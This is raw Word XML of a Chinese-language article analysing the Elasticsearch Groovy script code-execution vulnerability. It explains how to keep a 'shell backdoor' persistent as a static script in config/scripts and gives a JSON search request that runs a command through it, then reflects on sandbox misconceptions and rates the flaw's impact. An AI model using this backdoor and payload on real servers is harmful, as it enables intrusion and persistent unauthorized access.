          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>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D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不过使用脚本索引建立的后门有一个问题，就是需要在动态脚本开启的状态下。而官方提供给我们的最后一个调用脚本的方式——调用静态脚本，刚刚好可以帮助我们维持后门的持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRPr="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">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D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用方法如下：在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目录下建立一个名为scripts的目录，把脚本文件放进去，然后用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>script_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>替换上面的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>script_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>字段就好了。这里做一个简单的例子，在scripts里放上我们刚才的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>那个shell后门的代码，并命名为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>vul.groovy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，然后POST如下数据进行搜索：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -an"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果你足够仔细的话，可能会发现上面的代码中我使用的file而不是官方示例的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>script_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，因为我测试环境是1.3.5和1.4.10，而官方所提供的示例应该是针对MVEL表达式时代的静态表达式使用方法，所以有些时候不看代码是无法发现真相的→_→。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="004738"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>思维壁垒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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在和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lupin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一开始讨论这个漏洞的时候，发现我们思考的方式完全不一样。他在跟我说</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>怎么怎么</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>绕过沙盒，而我却不断的问</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>他沙盒</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在哪里？为什么我没有</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>感觉到沙盒的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>存在？从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lupin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://drops.wooyun.org/papers/5107" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a8"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4C4C4C"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>这篇文章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>描述的细节和下面官方对这个漏洞描述的内容以及官方对于漏洞的后期修复，再到这两天的全民反射来看，大家明显是都被带到沟里去了，把一个好好的代码执行漏洞玩成了命令执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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 xml:space="preserve">The vulnerabilities allow an attacker to construct Groovy scripts that escape the sandbox and execute shell commands as the user running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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如果让我用一句话来评论目前的大家使用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的话，“用C的方式来利用一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:tooltip="php" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="4C4C4C"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>PHP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码执行”，这句话再合适不过了。我在</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="4C4C4C"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>《一种新的攻击方法——Java-Web-Expression-Language-Injection》</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中提到的JELI的这种漏洞形式（或者说攻击方法），是由于开发者对于Java上层建筑的表达式认知度不够而导致漏洞的出现。Struts2没有想到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ognl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以执行Java代码，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>同样没有想到Groovy可以实现任意Java功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>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所以在这里我觉得有必要提醒大家一下，小心思维壁垒的出现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="004738"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>漏洞总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>漏洞小结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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影响范围个人评价为“高”，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ElasticSearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在大数据时代得到广泛的使用，而且此漏洞覆盖十个左右的版本，所以影响范围还是很广的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>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危害性个人评价为“极高”，此漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>值需要</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
